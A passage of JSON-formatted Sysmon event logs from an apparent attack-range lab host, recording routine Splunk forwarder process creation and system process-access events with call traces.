05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":1920,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.303\r\nProcessGuid: {A837DB8D-01C8-5F25-0000-0010E0D00300}\r\nProcessId: 4032\r\nImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe\r\nFileVersion: 8.0.2\r\nDescription: splunkd service\r\nProduct: splunk Application\r\nCompany: Splunk Inc.\r\nOriginalFileName: splunkd.exe\r\nCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool check --no-log\r\nCurrentDirectory: C:\\Windows\\system32\\\r\nUser: NT AUTHORITY\\SYSTEM\r\nLogonGuid: {A837DB8D-01B3-5F25-0000-0020E7030000}\r\nLogonId: 0x3E7\r\nTerminalSessionId: 0\r\nIntegrityLevel: System\r\nHashes: MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589\r\nParentProcessGuid: {A837DB8D-01C8-5F25-0000-001028D00300}\r\nParentProcessId: 4064\r\nParentImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nParentCommandLine: \"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" check --no-log","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.303","ProcessGuid":"{A837DB8D-01C8-5F25-0000-0010E0D00300}","Image":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunkd.exe","FileVersion":"8.0.2","Description":"splunkd service","Product":"splunk Application","Company":"Splunk Inc.","OriginalFileName":"splunkd.exe","CommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\" btool check --no-log","CurrentDirectory":"C:\\Windows\\system32\\","User":"NT AUTHORITY\\SYSTEM","LogonGuid":"{A837DB8D-01B3-5F25-0000-0020E7030000}","LogonId":"0x3e7","TerminalSessionId":"0","IntegrityLevel":"System","Hashes":"MD5=B6D66AB97239BFB32F1CC9B8BFE1B4E0,SHA256=9D5EC3AA587B29840BE53E8E11B1C3BFE2FA3413DD65459325CBEEAFA66D3975,IMPHASH=CD69F86EE9B3C12390F5C7499BD3A589","ParentProcessGuid":"{A837DB8D-01C8-5F25-0000-001028D00300}","ParentProcessId":"4064","ParentImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","ParentCommandLine":"\"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool\" check --no-log","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1921,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.297\r\nSourceProcessGUID: {A837DB8D-01C8-5F25-0000-001028D00300}\r\nSourceProcessId: 4064\r\nSourceThreadId: 4056\r\nSourceImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe\r\nTargetProcessGUID: {A837DB8D-01C8-5F25-0000-0010E0D00300}\r\nTargetProcessId: 4032\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.297","SourceProcessGUID":"{A837DB8D-01C8-5F25-0000-001028D00300}","SourceProcessId":"4064","SourceThreadId":"4056","SourceImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe","TargetProcessGUID":"{A837DB8D-01C8-5F25-0000-0010E0D00300}","TargetProcessId":"4032","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+239c|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2568|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+2926|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+11cf|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+1245|C:\\Program Files\\SplunkUniversalForwarder\\bin\\btool.exe+aa24|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1922,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.297\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 808\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-01C8-5F25-0000-0010E0D00300}\r\nTargetProcessId: 4032\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.297","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"808","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-01C8-5F25-0000-0010E0D00300}","TargetProcessId":"4032","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\SplunkD.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1923,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1924,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1925,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1926,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1927,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:46:48.297","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1072","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-01C5-5F25-0000-00105CBB0200}","TargetProcessId":"2740","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:46:48","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:46:48","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":1928,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:46:48.297\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1072\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-01C5-5F25-0000-00105CBB0200}\r\nTargetProcessId: 2740\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 